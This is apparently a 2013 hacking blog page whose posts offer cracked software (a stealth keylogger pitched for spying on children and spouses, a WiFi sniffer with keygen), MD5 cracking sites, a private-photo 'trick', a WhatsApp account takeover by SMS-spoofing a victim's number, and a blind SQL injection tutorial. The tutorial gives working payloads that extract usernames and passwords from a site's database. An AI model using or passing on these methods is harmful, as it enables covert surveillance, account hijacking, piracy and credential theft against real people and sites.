Showing posts with label Hacking. Show all posts
Showing posts with label Hacking. Show all posts

Wednesday, June 26, 2013

Download iSafesoft 3.5.8 AllInOne Keylogger+Serial


Download iSafesoft 3.5.8 AllInOne Keylogger+Serial

iSafesoft 3.5.8 AllInOne Keylogger+Serial

Supported Language: English
Downloading Mirrors: Tusfile.net Easy Download
Must Read The Full Post Before Download & Install

iSafesoft 3.5.8 AllInOne Keylogger+Serial Key is the best keylogger among all other keyloggers. this keylogger will give you guarantee to record every keystroke, important screenshot and website visited, process running or you pay nothing! the tracks work silently in the background and is unnoticeable and untraceable by computer security software. Including firewalls and anti-virus software (which are trained to sniff out malicious keyloggers). iSafe AllInOne Keylogger is a necessary "family-friendly" keylogger that supervises children, teenagers and even suspicious spouses. You can't afford not to know and with iSafe AllInOne Keylogger, you'll get every details Guaranteed. Gives you full control over monitoring PC and online activity. Works with Any and Every Chat, Word Processing, Browser and Email Program - Including:

Keylogger Features:
  • MySpace
  • Hotmail
  • Yahoo Messenger
  • MSN / Windows Live Messenger
  • AOL Instant Messenger (AIM)
  • Microsoft Office
  • Microsoft Outlook and Outlook Express
  • Microsoft Internet Explorer
  • Mozilla Firefox
  • Record all computer activities, keystrokes, screenshots, web sites surfed, clipboard, process and more...
  • Work in completely Stealth mode
  • All records are encrypted with AES256, no one but you can view or manage the logs
  • Completely self-hide. Not listed in Task Manager, Taskbar, Uninstall list and Start menu
  • Send the logs timely to your E-mail account
  • Powerful, Easy-to-Use, High Efficiency, Convenient Log-View-and-Management Tool

Download iSafesoft 3.5.8 AllInOne Keylogger+Serial
Screenshot-1
Download iSafesoft 3.5.8 AllInOne Keylogger+Serial
Screenshot-2
Download iSafesoft 3.5.8 AllInOne Keylogger+Serial
Screenshot-3


Safe-to-Use: Except running behind the system, the iSafe AllInOne Keylogger setup files folder also be hidden deeply. All the logs are highly strength encrypted and you need password to browse them

Easy-to-Use: iSafe AllInOne Keylogger's easy-to-use interface requires absolutely no computer experience. That means instead of fussing with complicated settings, you're up and running instantly - privately and fully logging every chat, email and keystroke from behind-the-scenes.

Unlimited Lifetime Tech Support: We support Unlimited Lifetime Tech Support - Available 24 hours a Day - Plus FREE Upgrades for One Year! Our commitment to your safety, security and privacy and professional technic level has made iSafe AllInOne Keylogger the fastest-growing internet monitoring software online!

Keystrokes Logging (Key Logging): Capture every single Keystroke they type including passwords. The iSafe Keylogger Spy Software can record all the applications running on your computer and the text typed in these applications (such as chat conversation, emails, documents, username, password, etc) aka Keystrokes Logger/Keystrokes Recorder. This, combined with the visual record (screenshots) gives you full control over the computer. Enable recording East Asian language support. Record Characters (Arabic, Japanese, Chinese, etc.)

Web Recording (Web Logger/Internet Logger/Web Sites Visited): Review every Web Site they visit and see what they do while on them, The keylogger can record all the web activity including visited web-pages URLs, sites titles, clicked links including the time the web site was visited! This, combined with the visual (screenshots), Chat and the keystroke recording, gives you full control over the computer.

Chat / Instant Message Recording (Chat Logger/IM Logger): All In One Keylogger records both sides of chat conversations of ICQ, Yahoo Messenger, AIM, MSN, Miranda, QIP and various other Chat/IM programs. Unlike other Keyloggers that monitor and record one side of the Chat conversation (Outgoing Messages), All In One Keylogger has a unique capability to capture both sides of the Chat conversation (Incoming & Outgoing Messages), which makes it a perfect Chat Logger/IM Logger as well.

Screenshot Logging (Spy Camera):And, best of all, with the world's best Screen Snapshot Surveillance recorder, you can see EVERYTHING they do, in the EXACT order they do it, Step-by-Step. This feature completes all textual logging features by bringing you the visual picture of your computer just like you installed automatic surveillance camera. It can even capture the mouse cursor and support dual monitor! You can easily change the frequency of taking screenshots from your computer. You can even configure it to take a screenshot on every mouse click and "Enter" key so you won't miss any event. You can set it to stop taking screenshot when the computer is idle and resume the visual surveillance after detecting mouse/keyboard activity.

Microphone Logging(Microphone Spy): Not like other keyloggers, All In One Keylogger can be used as an audio surveillance tool. It monitors and records sounds in your room via your computer microphone. This especially needed since you can monitor chats conversations made using the microphone and listen to any activity in your room. You can configure the keylogger to start recording only when the sound level is above a defined threshold, so that disk space and time will be conserved by not wasting recording/listening time when nobody is actually talking. This feature is usually sold as a sole product!

Printer Logging(Print document monitor): iSafe All In One keylogger can monitor all the printers in the same network with you can can record all the informations about the documents beening pritned, include users, document name, pages, job start time and more

Document and File Logging:Out keylogger can monitor and record the documents user opened or sent to or received from USB disk, CD-Roms

Log files Encryption: All your log files are encrypted to ensure your privacy.

Privacy & Stealthy: iSafe All In One Key logger is completely invisible. You can configure it not to be listed in Task Manager and to Hide its folder. You can also configure it not to be listed in Windows Task Bar, System Tray, MSConfig (Startup entry), Uninstall list (Add/Remove programs) And start menu.

Password Protection: Our Keylogger has password protection to prevent others from changing your configurations or viewing the log files. After configuring and starting the program, you can call All In One Keylogger simply by typing your password in any application you want. Just type the password and our Keylogger will show itself. You can also set special Hotkey for calling the keylogger password box.

Automatic Startup: All In One Key logger automatically starts logging in hidden mode when windows starts. Fully compatible with Vista/Windows 7 both 32 and 64 bit version

Log Maintenance: You can set the Keylogger to automatically delete logs older than X days.

Email Delivery: Thinking about going away from home for a couple of weeks and afraid of losing control over your computer? All In One Keylogger brings a solution: Sending logs by e-mail. In order to save hard drive space you can specify if you wish to delete the sent logs from your HD. iSafe Keylogger now support emails need SSL/TLS feature so you can use most email address to receive logs Email logs are in HTML format with screenshots embedded and audio files so it's more covenient to check and view

Filter Monitored User Accounts:All In One Keylogger allows you to specify users accounts you want, or don't want to monitor.

Html format reports: All In One Keylogger generate logs in more user-friendly HTML format.


Click The Link Below To Download

Mirrors Via TusFiles

Password: rajibkhaja

Tips: Don’t Forget To Comment Below On The Comment Box, Because Your Feedback Will Help Us To Fix If Any Bug Stay Here. Thanks.

Tuesday, June 11, 2013

Download Metasploit Penetration Testing Cookbook Free

Metasploit Penetration Testing Cookbook

Metasploit Penetration Testing Cookbook

Supported Language: English
Downloading Mirrors: Tusfile.net Easy Download
Must Read The Full Post Before Download & Install


Metasploit Is The Best Software that helps security and IT professionals identify security issues, easily verify the vulnerability mitigations, and manage expert-driven security assessments. Capabilities include smart exploitation, password auditing, web application scanning, and social engineering. Teams can collaborate in Metasploit and present their findings in consolidated reports. The goal of the software is to provide a clear understanding of the critical vulnerabilities in any environment and to manage those risks.

Books Features:
  • Chapter 1: Metasploit Quick Tips for Security Professionals covering: configuration, installation, basic use, and storing results in a database
  • Chapter 2: Information Gathering and Scanning covering: passive and active gathering, social engineering, scanning, Nessus, NeXpose, and Dradis
  • Chapter 3: Operating System-based Vulnerability Assessment covering: exploits, Windows XP, remote shells, Windows 2003, Windows 7, Linux, and DLL injection
  • Chapter 4: Client-side Exploitation and Antivirus bypass covering: IE, Word, Adobe Reader, payloads, and killing anti-virus
  • Chapter 5: Using Meterpreter to Explore the Compromised Target covering: Meterpreter commands, privilege escalation, communication channels, and snooping on Windows targets
  • Chapter 6: Advanced Meterpreter Scripting covering: hash dumps, back doors, pivoting, Railgun, pivoting, and killing firewalls
  • Chapter 7: Working with Modules for Penetration Testing covering: Auxiliary modules, admin modules, SQL injection, post-exploitation, and creating new modules
  • Chapter 8: Working with Exploits covering: mixins, msfvenum, going from exploit to Metasploit module, and fuzzing
  • Chapter 9: Working with Armitage covering: Getting started, information gathering, and targeting multiple machines
  • Chapter 10: Social Engineering Toolkit covering: Installation, configuration, spear-phishing, website attacks, and infectious media generation.
Click The Link Below To Download

Mirrors Via TusFiles
Password: rajibkhaja


Before Finish, if you are looking for a Metasploit book in cookbook format than this book would be a good choice.So no more waiting download & start learning.

Tips:Don’t Forget To Comment Below On The Comment Box, Because Your Feedback Will Help Us To Fix If Any Bug Stay Here. Thanks.

Best MD5 Cracking Websites For Hacker

Best MD5 Cracking Websites For Hacker

Best MD5 Cracking Websites For Hacker


MD5 Decrypt is best cracker for website, Its allows you to input an MD5 hash and search for its decrypted state in our database, basically, it's a MD5 cracker / decryption tool.

How To Decrypt MD5 Hash

How to Decrypt SHA1 Hash



So all my dear friends, I hope above sites should help you to decrypt MD5 and SHA1 hash and SHA1 / MD5 password using above sites. Enjoy MD5 and MD4 decrypter sites to decrypt MD5 and MD4 password hashes...
Tips:Don’t Forget To Comment Below On The Comment Box, Because Your Feedback Will Help Us To Fix If Any Bug Stay Here. Thanks.

Download Penetration Testing Distribution Kali Linux Latest Released

Free Latest Kali Linux Latest Released

Supported Language: English
Downloading Mirrors: Linux Site Download
Must Read The Full Post Before Download & Install

Penetration Testing Distribution Kali Linux Latest Released is the awesome program & its been Seven years of developing BackTrack Linux has taught us a significant amount about what we, and the security community, think a penetration testing distribution should look like. We’ve taken all of this knowledge and experience and implemented it in our “next generation” penetration testing distribution. After a year of silent development, we are incredibly proud to announce the release and public availability of “Kali Linux“, the most advanced, robust, and stable penetration testing distribution to date.

Download Free Latest Kali Linux Latest Released
Kali Screenshot
Kali is a more mature, secure, and enterprise-ready version of BackTrack Linux. Trying to list all the new features and possibilities that are now available in Kali would be an impossible task on this single page. We therefore invite you to visit our new Kali Linux Website and Kali Linux Documentation site to experience the goodness of Kali for yourself.

We are extremely excited about the future of the distribution and we can’t wait to see what the BackTrack community will do with Kali. Sign up in the new Kali Forums and join us in IRC in #kali-linux on irc.freenode.net and help us usher in this new era.
most advanced and state of the art penetration testing distribution available. Available in 32 bit, 64 bit, and ARM flavors.
 
Click The Link Below To Download

Mirrors Via Direct Link
Password: rajibkhaja

Tips: Don’t Forget To Comment Below On The Comment Box, Because Your Feedback Will Help Us To Fix If Any Bug Stay Here. Thanks.

Saturday, May 25, 2013

Download Commview Wifi Hacker v6.0.581 Full With Hacking Instructions

Commview Wifi Hacker v6.0.581 Full Version

Commview Wifi Hacker v6.0.581 Full Version



Supported Language: English
Downloading Mirrors: HugeFiles | BillionUploads | TusFiles
Must Read The Full Post Before Download & Install



Commview Wifi Hacker v6.0.581 Full Version is a powerful wireless network monitor and analyzer for 802.11 a/b/g/n networks. Loaded with many user-friendly features, CommView for WiFi combines performance and flexibility with an ease of use unmatched in the industry. CommView for WiFi captures every packet on the air to display important information such as the list of access points and stations, per-node and per-channel statistics, signal strength, a list of packets and network connections, protocol distribution charts, etc. By providing this information, CommView for WiFi can help you view and examine packets, pinpoint network problems, and troubleshoot software and hardware.

CommView for WiFi includes a VoIP module for in-depth analysis, recording, and playback of SIP and H.323 voice communications.

Packets can be decrypted utilizing user-defined WEP or WPA-PSK keys and are decoded down to the lowest layer. With over 70 supported protocols, this network analyzer allows you to see every detail of a captured packet using a convenient tree-like structure to display protocol layers and packet headers. Additionally, the product provides an open interface for plugging in custom decoding modules. WEP and WPA key retrieval add-ons are available subject to terms and conditions.

A number of case studies describe real-world applications of CommView for WiFi in business, government, and education sectors.

CommView for WiFi is a comprehensive and affordable tool for wireless LAN administrators, security professionals, network programmers, or anyone who wants to have a full picture of the WLAN traffic. This application runs under Windows XP/2003/Vista/2008/7 and requires a compatible wireless network adapter. To view the list of the adapters that have been tested and are compatible with CommView for WiFi, click on the link below:

SUPPORTED ADAPTERS

What you can do with CommView for WiFi
  • Scan the air for WiFi stations and access points.
  • Capture 802.11a, 802.11b, 802.11g, and 802.11n WLAN traffic.
  • Specify WEP or WPA keys to decrypt encrypted packets.
  • View detailed per-node and per-channel statistics.
  • View detailed IP connections statistics: IP addresses, ports, sessions, etc.
  • Reconstruct TCP sessions.
  • Configure alarms that can notify you about important events, such as suspicious packets, high bandwidth utilization, unknown addresses, rogue access points, etc.
  • View protocol "pie" charts.
  • Monitor bandwidth utilization.
  • Browse captured and decoded packets in real time.
  • Search for strings or hex data in captured packet contents.
  • Log individual or all packets to files.
  • Load and view capture files offline.
  • Import and export packets in Sniffer®, EtherPeek™, AiroPeek™, Observer®, NetMon, Tcpdump, hex, and text formats.
  • Export any IP address to SmartWhois for quick, easy IP lookup.
  • Capture data from multiple channels simultaneously using several USB adapters.
  • Capture A-MPDU and A-MSDU packets.
  • And much more!

Who needs CommView for WiFi
  1. WLAN administrators.
  2. Security professionals.
  3. Home users who are interested in monitoring their WLAN traffic.
  4. Programmers developing software for wireless networks.
System Requirements
  • Minimum: The application will run on requirements for the OS being used.
  • Recommended: 1600 MHz processor, 1GB of RAM, 10 MB disk space for program files, extra disk space may be required if captured packets are logged to the disk. Depending on the traffic volume and usage mode, the requirements may be higher.

Operating Systems (32- and 64-bit)
  • Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, or Windows 7

Program Features
  • Name : Commview Wifi Hacker
  • Version : v6.0.581
  • Languange : English
  • Medicine : Include - Keymaker MAZE
  • OS Support : Xp/Vista/7
  • Password : No
  • Type File : Rar
  • Code File : cwh
  • Updated : 25 Mei 2013
  • Publisher : Anonymouse
  • Size : 36 Mb


Click The Link Below To Download

Mirrors Via TusFiles
Mirrors Via HugeFiles
Mirrors Via BillionUploads
Password: rajibkhaja

Tips: Don’t Forget To Comment Below On The Comment Box, Because Your Feedback Will Help Us To Fix If Any Bug Stay Here. Thanks.

Sunday, May 19, 2013

MS-Word Keyboard Shortcuts + Download In Pdf

MS-Word Keyboard Shortcuts

MS-Word Keyboard Shortcuts



Hey buddy Are you looking for MS-Word Keyboard Shortcuts?? You are in right Place. Because everybody want to save time that’s why previously I wrote a Post on Windows Shortcuts and In this guide I am going to share all Microsoft Word Shortcut keys which helps you to save your time as well as make your work faster as never before. There are many shortcuts for common commands in Microsoft Word but here is a collection some of the best Shortcuts and also Download Pdf. So let's start..

MS-Word Keyboard Shortcuts:


  • Ctrl + b : you can order your favorite file by this command
  • ctrl + f : you can search for some word
  • ctrl + s : save the work you've done
  • ctrl + shift or right index makes the writing go to the left
  • alt + f4 : is useful to close the windows
  • alt + esc you can move from window to window
  • alt + tab : is very useful if there are many windows open you can choose the required window
  • alt + shift : switch between languages
  • f2 : very useful and fast to change the name of a specific file
  • Ctrl + C : Copy
  • Ctrl + X : Cut
  • Ctrl + V : Paste
  • Ctrl + Z : Undo
  • Ctrl + A : Select all
  • Ctrl + ESC : task list (Start)
  • Ctrl + Enter : Starting a new page
  • Ctrl + END : Move to end of file
  • Ctrl + F5 : Thumbnail file window
  • Ctrl + F6 : move between files
  • Ctrl + F2 : preview the page before printing
  • = + Ctrl : zoom in and out, one degree
  • F4 : repeat the last process
  • Alt + Enter : repeat the last process
  • Ctrl + Y : repeat the last process
  • Shift + F10 : Bullets and digital
  • F12 : Save As
  • Shift + F12 : Save the file
  • Ctrl + Home : the first document
  • Ctrl + End : Latest document
  • Shift + F1 : information about type of coordination
  • Ctrl + U : line under the text
  • Ctrl + F4 : Exit from the file
  • Ctrl + N : New File
  • Ctrl + H : Replacement
  • Ctrl + I : slash
  • Ctrl + K : Document Format
  • Ctrl + P : Print
  • Ctrl + O : open area
  • Alt + S : List Format
  • Alt + J : Help Menu
  • [+ Alt : List Table
  • ] + Alt : Tools Menu
  • Alt + U : View menu
  • Alt + P : Edit Menu
  • Alt + L : file list
  • "+ Alt : window List
  • Alt + Q : modified procedure
  • Ctrl + E : Center text
  • Ctrl + F : Search
  • Ctrl + B : black line
  • Ctrl + Shift + P : font size
  • Ctrl + Shift + S : Style
  • Ctrl + D : line
  • Ctrl + Shift + K : character conversion - Capital
  • Shift + F3 : character conversion - Capital
  • Ctrl + Shift + L : point at the beginning of the text
  • Ctrl + Alt + E : footnotes numbered Romanian
  • Ctrl + Alt + R : Mark ®
  • Ctrl + Alt + T : Mark ™
  • Ctrl + Alt + C : Mark ©
  • Ctrl + Alt + I : preview the page before printing
  • Shift + F7 : Thesaurus
  • Ctrl + Alt + F1 : System Information
  • Ctrl + Alt + F2 : Open Directories
  • Ctrl + J : resolving the text from both sides
  • Ctrl + L : the beginning of the text from the left side
  • Ctrl + Q : the beginning of the text from the right side
  • Ctrl + E : Center text
  • Ctrl + M : changing the size of the top paragraph
  • Shift + F5 : To return to the position that you finished it when you close the file
  • = + Ctrl + Alt : Customize
  • F3 : AutoText entry
  • F9 : Check fields
  • F10 : Move the framework to open windows
  • F1 : Help
  • F5 : Jump to
  • F7 : Spelling
  • F8 : Select Zone
Download PDF for MS-Word Keyboard Shortcut Keys:

  • If you want to know even more MS-Word Keyboard Shortcuts then Click Here to Download PDF File (Size-209KB).
  • If You know something more then Please share in the Comment section below. Enjoy..!! 

How To View Private Photos on Facebook

Facebook Photo Stalker
Screenshot
    People are always curious that how to view private profile picture on facebook & Earlier days many of them contacted me to get the trick to view the private photos of their friends on Facebook.I know it is very difficult to find out this.After these i have tried more seriously to know about this and at last i got the trick to view the photos that secretly saved in their Facebook profile.

 

Facebook Photo Stalker::

    I have found an application named Facebook Photo Stalker from Facebook that can show the secret photos and other information from anyone who use Facebook and secretly saved his photos.
    It is an application and it is developed by Josh Owns and it is a very useful software for those who like to view photos.

Steps to get Facebook Photo Stalker:

  • Go to Photo Stalker Application page
  • It shows allow application to access your profile, then click on Allow
  • It takes you to the application page as screenshot shown below
    Facebook Photo Stalker
    Screenshot
  • It shows a box to put Friends ID/URL/Name of the person you want to see the photos.
  • Click on ‘Click Continue
  • You will see profiles below and select the profile you want to view photos.
    Note about Facebook photo stalker:
    Sometimes it will not work as it does not follow the privacy policy and terms of service. More Facebook tricks are coming soon…so please keep in touch..

Saturday, May 18, 2013

Hack Whatsapp Through Easy method

Hacked Whatsapp

Hack Whatsapp easy method

Hacking Trick-1:

Use Whatsapp With Someone Else's Number!!! This hack works by tricking the WhatsApp Verification Servers by sending a spoofed request for an authorization code
Intended for an alternative phone.
  1. Install WhatsApp on your device WhatsApp now starts a counter where it sends a
  2. verification message to its servers.
  3. Block the message service it can be blocked by changing the message center number or pushing the phone into Airplane mode.
  4. WhatsApp now offers an alternative method of verification Choose verify through SMS and fill in your email address. Once you click to send the SMS click cancel to terminate the call for authorization to the WhatsApp server.
  5. Now You have to do sms Spoofing You can do it using this App For Android Check your outbox and copy the message details into the spoofed application and send the spoofed verification. - Use this App and Send sms: To: +447900347295 From: +(Country code) (victims mobile number) Message: (your email address).
  6. 5. You will now receive messages intended for the spoofed number on your mobile device and you can communicate with people under the spoofed number and You have successfully hacked their whatsapp account !!

Hacking Trick-2:

How to get whats app free for 10 years:

..::Requirement ­s ::..
Iphone or Ipad 2.Android or Nokia Device with whatsapp

..:: Procedure ::..
  1. Remove whatsapp from your phone and take help from your friend who have owned Iphone or Ipad.
  2. Ask him to register whatsapp with your number.
  3. You will get an verification code on your phone, tell him verification code received on your number and enter it on his iPhone.
  4. After you have done all that steps whatsapp will start on your friend’s iPhone,just check account info and it will be updated to 2022.
  5. 5.Ask your friend to delete it and install the latest version on your phone and check its expiration date.

Hope you learned something from this Tutorial. Have FUN!
This Article Written By Tensed Boy Shimul

What Is Blind SQL.......?

Blind SQL Injection

 Language: English
Platform: Windows Only
Must Read The Full Post Before Download & Install


Blind SQL Injection is used when a web application is vulnerable to an SQL injection but the results of the injection are not visible to the attacker. The page with the vulnerability may not be one that displays data but will display differently depending on the results of a logical statement injected into the legitimate SQL statement called for that page. This type of attack can become time-intensive because a new statement must be crafted for each bit recovered. There are several tools that can automate these attacks once the location of the vulnerability and the target information has been established

Read Below Tutorial Blind SQLi

Let’s Start…………

Suppose That You want to Hack This website with Blind SQLi http://site.com/index.php?id=5 when we execute this, we see some page and articles on that page, pictures etc…

After that when we want to test it for blind sql injection attack http://www.site.com/index.php?id=5 and 1=1 <--- this is always true and the page loads normally, that's ok.

Now the real test follow http://www.site.com/index.php?id=5and 1=2 <--- this is false
so if some text, picture or some content is missing on returned page then that site is vulnerable to blind sql injection.

  • 1) Get the MySQL version to get the version in blind attack we use substring i.e http://www.site.com/index.php?id=5 and substring(@@version,1,1)=4 this should return TRUE if the version of MySQL is 4. replace 4 with 5, and if query return TRUE then the version is 5. i.e. http://www.site.com/index.php?id=5 and substring(@@version,1,1)=5
  • 2) Test if subselect works when select don't work then we use subselect i.e http://www.site.com/index.php?id=5 and (select 1)=1 if page loads normally then subselects work. then we gonna see if we have access to mysql.user i.e http://www.site.com/index.php?id=5 and (select 1 from mysql.user limit 0,1)=1 if page loads normally we have access to mysql.user and then later we can Pull some password using load_file() function and OUTFILE.
  • 3). Check table and column names This is part when guessing is the best friend i.e. http://www.site.com/index.php?id=5 and (select 1 from users limit 0,1)=1 (with limit 0,1 our query here returns 1 row of data, cause subselect returns only 1 row, this is very important.) then if the page loads normally without content missing, the table users exits. if you get FALSE (some article missing), just change table name until you guess the right one let's say that we have found that table name is users, now what we need is column name. the same as table name, we start guessing. Like i said before try the common names for columns. i.e http://www.site.com/index.php?id=5 and (select substring(concat(1, password),1,1) from users limit 0,1)=1 if the page loads normally we know that column name is password (if we get false then try common names or just guess) here we merge 1 with the column password, then substring returns the first character (,1,1)

  • 4). Pull data from database we found table users i columns username password so we gonna pull characters from that. http://www.site.com/index.php?id=5and ascii(substring((SELECT concat (username,0x3a,password) from users limit 0,1),1,1))>80 ok this here pulls the first character from first user in table users. substring here returns first character and 1 character in length. ascii() converts that 1 character into ascii value and then compare it with simbol greater then > . so if the ascii char greater then 80, the page loads normally. (TRUE) we keep trying until we get false. http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat (username,0x3a,password) from users limit 0,1),1,1))>95 we get TRUE, keep incrementing http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat (username,0x3a,password) from users limit 0,1),1,1))>98 TRUE again, higher http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat (username,0x3a,password) from users limit 0,1),1,1))>99 FALSE!!! so the first character in username is char(99). Using the ascii converter we know that char(99) is letter 'c'. then let's check the second character. http://www.site.com/index.php?id=5and ascii(substring((SELECT concat (username,0x3a,password) from users limit 0,1),2,1))>99 Note that i'm changed ,1,1 to ,2,1 to get the second character. (now it returns the second character, 1 character in lenght) http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat (username,0x3a,password) from users limit 0,1),1,1))>99 TRUE, the page loads normally, higher. http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat (username,0x3a,password) from users limit 0,1),1,1))>107 FALSE, lower number. http://www.site.com/index.php?id=5and ascii(substring((SELECT concat (username,0x3a,password) from users limit 0,1),1,1))>104 TRUE, higher. http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat (username,0x3a,password) from users limit 0,1),1,1))>105 FALSE!!! we know that the second character is char(105) and that is 'i'. We have 'ci' so far so keep incrementing until you get the end. (when >0 returns false we know that we have reach the end). There are some tools for Blind SQL Injection, i think sqlmap is the best, but i'm doing everything manually, cause that makes you better SQL INJECTOR

Hope you learned something from this Tutorial. Have FUN!

Written By Tense Boy Shimul